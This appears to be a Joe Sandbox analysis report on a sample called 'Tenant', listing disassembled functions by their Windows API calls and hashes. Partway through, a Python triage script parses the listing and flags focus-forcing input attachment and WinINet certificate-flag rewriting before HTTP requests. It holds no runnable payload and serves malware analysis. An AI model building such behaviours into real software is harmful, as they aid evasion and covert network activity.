                                                                                        • Instruction ID: 7f21342f266349c9b03c2befa603240abd39e6e3dc1f9467f54f147cb8dcb92a
                                                                                        • Opcode Fuzzy Hash: af84605448517b377566194098c147198f47e1786c02e9b88c92fbaf78d78292
                                                                                        • Instruction Fuzzy Hash: 5E31E171611208BFDB24EF58DC94BA93BEAEF65315F208A55F810C71D0CFB89D408B50
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000008), ref: 00AA260D
                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00AA2617
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00AA262C
                                                                                        • GetStockObject.GDI32(00000005), ref: 00AA2634
                                                                                        • GetClientRect.USER32(?), ref: 00ADC0FC
                                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00ADC113
                                                                                        • GetWindowDC.USER32(?), ref: 00ADC11F
                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00ADC12E
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00ADC140
                                                                                        • GetSysColor.USER32(00000005), ref: 00ADC15E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3430376129-0
                                                                                        • Opcode ID: 6785e8d415843ad97e03ebe77c4cd9af3eda68f9b4e4cbd6d63ba3ae5f90ba25
                                                                                        • Instruction ID: ff1480f730f44570b5d4f28dea565e90914986d52d8797b8a535fb14b0410676
                                                                                        • Opcode Fuzzy Hash: 6785e8d415843ad97e03ebe77c4cd9af3eda68f9b4e4cbd6d63ba3ae5f90ba25
                                                                                        • Instruction Fuzzy Hash: 9B119731510206BFDB216FA4EC59BED7BB6EF19321F200265FA26A60E1CF310960EF10
                                                                                        APIs
                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00AAADE1
                                                                                        • OleUninitialize.OLE32(?,00000000), ref: 00AAAE80
                                                                                        • UnregisterHotKey.USER32(?), ref: 00AAAFD7
                                                                                        • DestroyWindow.USER32(?), ref: 00AE2F64
                                                                                        • FreeLibrary.KERNEL32(?), ref: 00AE2FC9
                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AE2FF6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                        • String ID: close all
                                                                                        • API String ID: 469580280-3243417748
                                                                                        • Opcode ID: 907f0924692c2226136026a6d901e4cf1cf5d5cf8279ccbedccc2f2d25eb4ff5
                                                                                        • Instruction ID: 1888f94fa0f18b117acffdf06d76b8adda3f2d8fb9cec0123daf0ace929c91b4
                                                                                        • Opcode Fuzzy Hash: 907f0924692c2226136026a6d901e4cf1cf5d5cf8279ccbedccc2f2d25eb4ff5
                                                                                        • Instruction Fuzzy Hash: C0A15E71701212CFCB29EF55C999F69F7A4BF15700F1542ACE40AAB292CB31AD12CF91
                                                                                        APIs
                                                                                        • EnumChildWindows.USER32(?,00AFB13A), ref: 00AFB078
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ChildEnumWindows
                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                        • API String ID: 3555792229-1603158881
                                                                                        • Opcode ID: 175ea3289e0f1d07794d45389b542ece0f4fc77f5b4fe6431ec7cd49f6d75f6b
                                                                                        • Instruction ID: 91e2d27bfb7b17aabf3f767c6f9ab619310662e8bdb96f02654c7ad4f9cb269b
                                                                                        • Opcode Fuzzy Hash: 175ea3289e0f1d07794d45389b542ece0f4fc77f5b4fe6431ec7cd49f6d75f6b
                                                                                        • Instruction Fuzzy Hash: CE9181B1600109EACB18EFA0C581FFEFB75BF14310F548119FA5AA7251DF306A59CBA1
                                                                                        APIs
                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00AA327E
                                                                                          • Part of subcall function 00AA218F: GetClientRect.USER32(?,?), ref: 00AA21B8
                                                                                          • Part of subcall function 00AA218F: GetWindowRect.USER32(?,?), ref: 00AA21F9
                                                                                          • Part of subcall function 00AA218F: ScreenToClient.USER32(?,?), ref: 00AA2221
                                                                                        • GetDC.USER32 ref: 00ADD073
                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00ADD086
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00ADD094
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00ADD0A9
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00ADD0B1
                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00ADD13C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                        • String ID: U
                                                                                        • API String ID: 4009187628-3372436214
                                                                                        • Opcode ID: 10ba2d548486d3bb47232ee45e4d6665ad47f28fe61f21387ff5aaf78332a709
                                                                                        • Instruction ID: 9f400bffef8479437999620549adca9b580a5bbb7f45fd155e2ebe714f00bf0d
                                                                                        • Opcode Fuzzy Hash: 10ba2d548486d3bb47232ee45e4d6665ad47f28fe61f21387ff5aaf78332a709
                                                                                        • Instruction Fuzzy Hash: 1371DF31400205EFCF219F64C885AFA7BB5FF9A324F24426AFD565B2A6CB318D41DB60
                                                                                        APIs
                                                                                          • Part of subcall function 00AA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00AA29F3
                                                                                          • Part of subcall function 00AA2714: GetCursorPos.USER32(?), ref: 00AA2727
                                                                                          • Part of subcall function 00AA2714: ScreenToClient.USER32(00B677B0,?), ref: 00AA2744
                                                                                          • Part of subcall function 00AA2714: GetAsyncKeyState.USER32(00000001), ref: 00AA2769
                                                                                          • Part of subcall function 00AA2714: GetAsyncKeyState.USER32(00000002), ref: 00AA2777
                                                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00B2C69C
                                                                                        • ImageList_EndDrag.COMCTL32 ref: 00B2C6A2
                                                                                        • ReleaseCapture.USER32 ref: 00B2C6A8
                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00B2C752
                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00B2C765
                                                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00B2C847
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                        • API String ID: 1924731296-2107944366
                                                                                        • Opcode ID: b4eac9e176503c2bff890221490e1425fa4af70a76bb1eeea52751723aa50d0c
                                                                                        • Instruction ID: cf5f5623634ac20a2e47f01ad9199a7bfbc78ffc955f2c59335025039a30293e
                                                                                        • Opcode Fuzzy Hash: b4eac9e176503c2bff890221490e1425fa4af70a76bb1eeea52751723aa50d0c
                                                                                        • Instruction Fuzzy Hash: 7B51AA30208304AFD704EF24DC5AF6E7BE5EB88314F108559F959872E2CB71A914CB52
                                                                                        APIs
                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B1211C
                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B12148
                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00B1218A
                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00B1219F
                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B121AC
                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00B121DC
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00B12223
                                                                                          • Part of subcall function 00B12B4F: GetLastError.KERNEL32(?,?,00B11EE3,00000000,00000000,00000001), ref: 00B12B64
                                                                                          • Part of subcall function 00B12B4F: SetEvent.KERNEL32(?,?,00B11EE3,00000000,00000000,00000001), ref: 00B12B79
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                        • String ID:
                                                                                        • API String ID: 2603140658-3916222277
                                                                                        • Opcode ID: f4e9e8955fed8b4db2f24bb7080960f30a76325d0e0e49f32df5f6694922b38c
                                                                                        • Instruction ID: b5ac935de81ded75a3dc3a526ec9d58156128a6bb8a534ef92b98e55c9bb3cc7
                                                                                        • Opcode Fuzzy Hash: f4e9e8955fed8b4db2f24bb7080960f30a76325d0e0e49f32df5f6694922b38c
                                                                                        • Instruction Fuzzy Hash: BB416DB1501208BFEB169F50CC89FFF7BACEF08354F504156FA059A151DB70AEA48BA0
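The report lists each recovered function as an "APIs" block (call, module, static argument values, reference address) followed by the memory-dump region it was carved from. The Python below is an added example, not part of the Joe Sandbox report or of the sample's code: it parses those lines into structured records, flags the two call patterns in this section that matter for triage (the GetForegroundWindow/AttachThreadInput focus-forcing routine at 00B01A03, whose neighbouring strings CLASSNN, REGEXPCLASS and @GUI_DRAGFILE are AutoIt runtime identifiers, and the WinINet routine at 00B1211C that rewrites INTERNET_OPTION_SECURITY_FLAGS, option 0x1F, before HttpSendRequestW), and decodes the .sdmp dump names. The sample lines are copied from the listing above. The reading of the dump-name fields (process, dump index, base, PAGE_* protection, MEM_* type) is an inference from the values on this page cross-checked against the hcaresult_11_2_aa0000 snapshot name, not a documented format, and the argument values are static disassembly guesses, so the 00000100 in the InternetSetOptionW buffer slot is not necessarily the flag value that reaches the API.

```python
import re

# Constructed sample: API lines copied verbatim from two of the report's
# function blocks (the AttachThreadInput routine at 00B01A03 and the WinINet
# routine at 00B1211C); each "APIs" header starts a new function.
SAMPLE = """\
APIs
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00B00A67,?,00000001), ref: 00B01A03
• GetWindowThreadProcessId.USER32(00000000), ref: 00B01A0A
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B00A67,?,00000001), ref: 00B01A19
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B1211C
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B12148
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00B1218A
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00B1219F
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B121AC
• InternetCloseHandle.WININET(00000000), ref: 00B12223
  • Part of subcall function 00B12B4F: GetLastError.KERNEL32(?,?,00B11EE3,00000000,00000000,00000001), ref: 00B12B64
"""

# One call line: optional "Part of subcall function X:" prefix, Api.MODULE,
# optional "(args)", then "ref: ADDR". Lines such as "GetDC.USER32 ref: ..." have no args.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

INTERNET_OPTION_SECURITY_FLAGS = 0x1F  # wininet.h


def _arg(tok):
    """'?' is an unresolved value; 8 hex digits is a static immediate or pointer."""
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-F]{8}", tok):
        return int(tok, 16)
    return tok  # literal strings such as "close all" passed to mciSendStringW


def parse_api_lines(text):
    """Split the listing into functions (one per 'APIs' header) of call records."""
    functions = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            functions.append([])
            continue
        m = LINE_RE.match(line)
        if not m:
            continue  # hash, dump-source and similarity lines are not calls
        if not functions:
            functions.append([])
        args = m.group("args")
        functions[-1].append({
            "api": m.group("api"),
            "module": m.group("mod"),
            "args": [_arg(a) for a in args.split(",")] if args else [],
            "ref": int(m.group("ref"), 16),
            "subcall": int(m.group("sub"), 16) if m.group("sub") else None,
        })
    return functions


def flag_sequences(functions):
    """Return (first_ref, note) for call patterns worth a second look."""
    notes = []
    for calls in functions:
        names = [c["api"] for c in calls]
        first = calls[0]["ref"] if calls else 0
        if "GetForegroundWindow" in names and "AttachThreadInput" in names:
            notes.append((first, "attaches to the foreground window's input thread "
                                 "(forced focus / shared keyboard state)"))
        sets_sec = [c for c in calls if c["api"] == "InternetSetOptionW"
                    and len(c["args"]) > 1 and c["args"][1] == INTERNET_OPTION_SECURITY_FLAGS]
        if sets_sec and "HttpSendRequestW" in names:
            notes.append((first, "rewrites INTERNET_OPTION_SECURITY_FLAGS before "
                                 "HttpSendRequestW; check the flag value for IGNORE_* bits"))
    return notes


# Win32 constants used to read the dump-name fields. The field layout is an
# assumption inferred from the values on this page, not a documented format.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}


def parse_dump_name(name):
    """Decode '<proc>.<dump>.<n>.<base>.<protect>.<?>.<type>.<n>.sdmp'."""
    f = name.split(".")
    if f[-1] != "sdmp" or len(f) != 9:
        raise ValueError("not a Joe Sandbox .sdmp name: %r" % name)
    protect, mtype = int(f[4], 16), int(f[6], 16)
    return {
        "process": int(f[0], 16),  # 0xB matches the '11' in hcaresult_11_2_aa0000
        "dump": int(f[1], 16),     # 2 matches the '_2_' in that snapshot name
        "base": int(f[3], 16),
        "protect": PAGE_PROTECT.get(protect, hex(protect)),
        "type": MEM_TYPE.get(mtype, hex(mtype)),
    }


if __name__ == "__main__":
    for ref, note in flag_sequences(parse_api_lines(SAMPLE)):
        print("%08X: %s" % (ref, note))
```

Run against the whole report the parser gives one record per call, so the same two rules can be applied to every function block rather than read by eye; the dump-name decoder explains why the code block at AA1000 is PAGE_EXECUTE_READ while the B60000 region is PAGE_READWRITE (the image's .data), both inside MEM_IMAGE.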
                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00B30980), ref: 00B19412
                                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00B30980), ref: 00B19446
                                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00B195C0
                                                                                        • SysFreeString.OLEAUT32(?), ref: 00B195EA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                        • String ID:
                                                                                        • API String ID: 560350794-0
                                                                                        • Opcode ID: aab19308140587fda03a0268516bea2abd31c669532e3639c0fe296189a2493f
                                                                                        • Instruction ID: e4778138bd79067f489d6ac8230716867f394a0f420e726d42a883381dc9ac73
                                                                                        • Opcode Fuzzy Hash: aab19308140587fda03a0268516bea2abd31c669532e3639c0fe296189a2493f
                                                                                        • Instruction Fuzzy Hash: A9F12B71A00209EFDB14DF94C894EEEB7B9FF49714F508098F516AB291DB31AE85CB50
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00B1FD9E
                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B1FF31
                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B1FF55
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B1FF95
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B1FFB7
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B20133
                                                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00B20165
                                                                                        • CloseHandle.KERNEL32(?), ref: 00B20194
                                                                                        • CloseHandle.KERNEL32(?), ref: 00B2020B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                        • String ID:
                                                                                        • API String ID: 4090791747-0
                                                                                        • Opcode ID: cc01f97be41e49a168859914aca5c928238314631dd29f6c0e8b602e17e7ee25
                                                                                        • Instruction ID: afb427132386d587ba9c6c7b2366d61f234132096f9e7a1d76aa714a62a771ba
                                                                                        • Opcode Fuzzy Hash: cc01f97be41e49a168859914aca5c928238314631dd29f6c0e8b602e17e7ee25
                                                                                        • Instruction Fuzzy Hash: 78E1AE316043019FDB14EF24C991B6EBBE5EF89314F1485ADF9899B2A2CB71EC41CB52
                                                                                        APIs
                                                                                          • Part of subcall function 00B04BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B03B8A,?), ref: 00B04BE0
                                                                                          • Part of subcall function 00B04BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B03B8A,?), ref: 00B04BF9
                                                                                          • Part of subcall function 00B04FEC: GetFileAttributesW.KERNEL32(?,00B03BFE), ref: 00B04FED
                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00B052FB
                                                                                        • _wcscmp.LIBCMT ref: 00B05315
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00B05330
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 793581249-0
                                                                                        • Opcode ID: eeba59673dd828292a4cc0a418aeb6834a5625d011ab3db107c3972f24d0495e
                                                                                        • Instruction ID: 625e02eaac4a950a0a9cad36b6db1f66b38904cedb1f745d3b2cf1a87dcaed32
                                                                                        • Opcode Fuzzy Hash: eeba59673dd828292a4cc0a418aeb6834a5625d011ab3db107c3972f24d0495e
                                                                                        • Instruction Fuzzy Hash: 195176B24083855BC734DB50D991EDFB7ECEF84340F50495EB589D3192EF34A6888B66
                                                                                        APIs
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B28D24
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: InvalidateRect
                                                                                        • String ID:
                                                                                        • API String ID: 634782764-0
                                                                                        • Opcode ID: be4f1a479cfe350987a622c9de41886fd3d2bb5ae989842dbee80750525d63ae
                                                                                        • Instruction ID: 66a067abd150127e7e07491a8aba04ab40a09c5d624450bb3bd18296f29f0fda
                                                                                        • Opcode Fuzzy Hash: be4f1a479cfe350987a622c9de41886fd3d2bb5ae989842dbee80750525d63ae
                                                                                        • Instruction Fuzzy Hash: AC51AD30643224BFEF24AB28EC89B9D3BE4EB05350F244595F918EB1E1CF71A9949A50
                                                                                        APIs
                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00ADC638
                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00ADC65A
                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00ADC672
                                                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00ADC690
                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00ADC6B1
                                                                                        • DestroyIcon.USER32(00000000), ref: 00ADC6C0
                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00ADC6DD
                                                                                        • DestroyIcon.USER32(?), ref: 00ADC6EC
                                                                                          • Part of subcall function 00B2AAD4: DeleteObject.GDI32(00000000), ref: 00B2AB0D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                        • String ID:
                                                                                        • API String ID: 2819616528-0
                                                                                        • Opcode ID: 9e5a9e75e7f13b96b09e928615b1e08af4ae02cd058fde542826bb9259428250
                                                                                        • Instruction ID: 60c1e29293240a7b2848e02c325b9866ef437be66dff66e271717dc66e1a51f6
                                                                                        • Opcode Fuzzy Hash: 9e5a9e75e7f13b96b09e928615b1e08af4ae02cd058fde542826bb9259428250
                                                                                        • Instruction Fuzzy Hash: 3351577061020AAFDB24DF28CD55BAE7BB5EF49720F204529F946A72D0DB70EDA0DB50
                                                                                        APIs
                                                                                          • Part of subcall function 00AFB52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AFB54D
                                                                                          • Part of subcall function 00AFB52D: GetCurrentThreadId.KERNEL32 ref: 00AFB554
                                                                                          • Part of subcall function 00AFB52D: AttachThreadInput.USER32(00000000,?,00AFA23B,?,00000001), ref: 00AFB55B
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00AFA246
